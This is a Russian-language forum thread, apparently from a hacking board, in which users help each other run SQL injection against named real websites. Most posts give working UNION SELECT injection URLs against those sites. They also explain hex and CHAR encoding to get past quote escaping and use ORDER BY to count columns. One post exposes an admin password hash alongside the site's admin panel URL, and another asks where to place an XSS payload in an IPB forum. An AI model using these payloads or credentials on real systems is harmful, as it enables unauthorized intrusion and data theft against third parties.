Даже не знаю.. Может там две таблицы admin? Одна лежит в бд к которой ты подключен, но в ней нет колонок "admin_user","admin_password". А вторая в другой бд и в ней как раз эти колонки? Маловероятно, конечно, но вдруг ^^ А вообще - лучше линк выкладывать...
Ребята, такой вопрос. Нашол таблицу phpbb_users, при запросе http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+information_schema.columns+where+table_name=%27phpbb_users%27+limit+1,1 выбивало ошибку, прочитал весь форум, понял, нада закодирывать...кодирнул в чар...выдаёт тупо пустую страницу....В чём моя ошибка....подскажите плиз..всю ночь просидел.
Возможно, ты кодируешь 'phpbb_users', а нужно phpbb_users. (без кавычек) Code: http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1--
Подскажи плиз, что можна с пасом зделать? loginv pass:e4a1767e13d8cae53abc0a69c5e6c3cd adminka http://www.cdma.kh.ua/admin
F.a.q. - всё о хешах : https://forum.antichat.ru/thread26983.html On-line cервисы расшифровки md5 : https://forum.antichat.ru/threadnav11028-1-10.html
Вопрос насчет скули.. http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+102,1-- вижу, что есть таблица users. пытаюсь получить столбцы, но не выхходит =( http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'-- помогите, пожалуйста - тут чистый интерес.
wildshaman Кавычки не жрёт Зехекси users и перебирай. http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273-- выводит нормально.
Не подскажите нуда XSS вставлять в этом коде? Или путь до JS XSS для IPB v2.1.7 Если ставлю вместо вот такое то всё ок но после перехода по картинке (которая образованна XSS) выходит сообщение: "Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова." также пробовал вставить туда Ошибка таже...
Гоняем одни и те-же вопросы по кругу. Господа, вывод это не мёд (вроде есть, и сразу нет), он или есть, или нет. Если Вы видите вывод цифры, то он есть 100%, а невозможность вывода данных может быть только в нескольких случаях 1 Таблица пустая Проверяется count(*) union+select+1,2,count(*),4+from+user либо для 5 ветки так union+select+1,table_rows+from+information_schema.tables+where+table_name='user' Если ковычки слешируются, перевести название таблицы/колонки в hex или в CHAR, кому как нравится Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем): union+select+1,table_rows+from+information_schema.tables+where+table_name=0x7573657273 для CHAR так: union+select+1,table_rows+from+information_schema.tables+where+table_name=char(117,115,101,114,115) Как видим обошлись без ковычек (сдесь table_name=users) Некоторые индивидумы умудряются загонять в хекс или чар вместе с ковычками, тоесть так 'users'=27757365727327, так делать ненадо, я Вас умоляю ) Внимание, операторы, функции, и т.д переводить в hex или char нельзя(точнее, переводить то можно, но база Вас не поймёт )) 2 Таблица в другой базе В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт Проверяем(5 ветка) : table_schema+from+information_schema.tables+where+table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна union+select+1,2,count(*),4+from+base.user (по аналогии с mysql.user) 3 Несоответствие кодировки Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов: cast(Version()+as+binary) CONVERT(Version(),binary) convert(version()+using+latin1) Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке aes_decrypt(aes_encrypt(Version(),1),1) unhex(hex(version())) 4 Несоответствие типа данных MySql к типам данных лоялен, а вот другие базы нет.Если база не mysql, читаем статьи по своей базе и приводим данные к нужному типу. 5 Закрыт доступ к таблице\базе Опять-же, в mysql нельзя ограничить доступ к таблице, (можно только к базе), а в некоторых других базах можно *Все примеры даны для mysql , в других базах другой синтаксис(читаем статьи) Это основные причины невозможности вывода данных, которые решат 99% ваших вопросов.
jokester Молодец конечно, за старания +, но дело в том, что сейчас твой пост в следующей паре затеряется и все вопросы начнут прогонять по кругу.Одни и те же. ЛЮДИ, читайте тему! На любой ваш вопрос здесь 99% уже есть ответ, и не один! На банальные вопросы в скором времени вам никто отвечать не будет, будете обижаться.Включайте мозг, и платите налоги =)
Вот вопрсоег. http://www.electionguide.org/country-news.php?ID=208+GROUP+BY+8+-- - ошибка не выводится, значит столбцов 8. Делаю запрос http://www.electionguide.org/country-news.php?ID=208+UNION+SELECT+1,2,3,4,5,6,7,8+-- А мне пишет: Query Error: The used SELECT statements have a different number of columns Как будто количество неверно...
Потому что там вот такая ошибка идет: Code: http://www.electionguide.org/country-news.php?ID=208+order+by+10-- LEFT JOIN, или искать уязвимость в другом месте, или фактически blind sql-inj
Используй order+by Нет ошибки: Code: http://www.electionguide.org/country-news.php?ID=208+order+by+50-- Ошибка: Code: http://www.electionguide.org/country-news.php?ID=208+order+by+51-- Итого: Code: http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0-- Вывод в title.
